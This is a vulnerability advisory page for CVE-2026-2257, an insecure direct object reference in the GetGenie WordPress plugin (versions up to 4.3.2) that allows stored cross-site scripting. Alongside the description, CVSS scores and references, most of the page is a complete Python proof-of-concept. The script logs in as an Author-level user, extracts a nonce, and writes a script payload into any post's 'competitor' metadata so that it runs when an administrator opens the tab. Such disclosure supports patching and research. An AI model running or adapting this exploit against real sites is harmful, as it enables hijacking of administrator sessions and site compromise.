Security Vulnerability Report
CVE-2026-2257 CVSS 6.4 MEDIUM


Published: 2026-03-13 19:54:33
Last Modified: 2026-04-22 21:30:26

Description

The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2 due to missing validation on a user controlled key in the `action` function. This makes it possible for authenticated attackers, with Author-level access and above, to update post metadata for arbitrary posts. Combined with a lack of input sanitization, this leads to Stored Cross-Site Scripting when a higher-privileged user (such as an Administrator) views the affected post's "Competitor" tab in the GetGenie sidebar.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GetGenie plugin for WordPress <= 4.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re
import requests
import sys

# CVE-2026-2257 PoC - GetGenie IDOR + Stored XSS
# Target: WordPress with GetGenie plugin <= 4.3.2

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_author"
PASSWORD = "attacker_password"
TARGET_POST_ID = 123  # Target post ID to inject XSS
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def get_nonce(url, username, password):
    """Login and get WordPress nonce"""
    session = requests.Session()
    login_url = f"{url}/wp-login.php"
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
    }
    session.post(login_url, data=login_data)

    # Get nonce from admin or plugin page
    admin_url = f"{url}/wp-admin/admin.php?page=getgenie_dashboard"
    resp = session.get(admin_url)

    # Extract nonce from page content
    nonce_match = re.search(r'nonce":"([a-zA-Z0-9]+)"', resp.text)
    if nonce_match:
        return session, nonce_match.group(1)
    return session, None


def exploit_idor_xss(url, session, nonce, post_id, payload):
    """Exploit IDOR to update arbitrary post metadata with XSS"""
    exploit_url = f"{url}/wp-admin/admin-ajax.php"

    # Construct the malicious request
    data = {
        "action": "getgenie_store",
        "_wpnonce": nonce,
        "post_id": post_id,      # IDOR: can target any post
        "competitor": payload,   # XSS payload
    }
    response = session.post(exploit_url, data=data)
    return response.status_code == 200


if __name__ == "__main__":
    print("[*] CVE-2026-2257 PoC - GetGenie IDOR + Stored XSS")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Targeting post ID: {TARGET_POST_ID}")

    session, nonce = get_nonce(TARGET_URL, USERNAME, PASSWORD)
    if not nonce:
        print("[-] Failed to obtain nonce")
        sys.exit(1)
    print("[+] Logged in successfully")

    if exploit_idor_xss(TARGET_URL, session, nonce, TARGET_POST_ID, XSS_PAYLOAD):
        print(f"[+] XSS payload injected into post {TARGET_POST_ID}")
        print("[+] Payload will execute when admin views Competitor tab")
    else:
        print("[-] Exploitation failed")

References

https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/Store.php#L32
https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/Store.php#L74
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3479838%40getgenie%2Ftrunk&old=3446466%40getgenie%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/0f7b119d-ec56-40cb-80ef-67585dadad77?source=cve

Additional Record Data

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)
Vulnerability Status: Deferred
Exploitability Sub-score: 3.1
Impact Sub-score: 2.7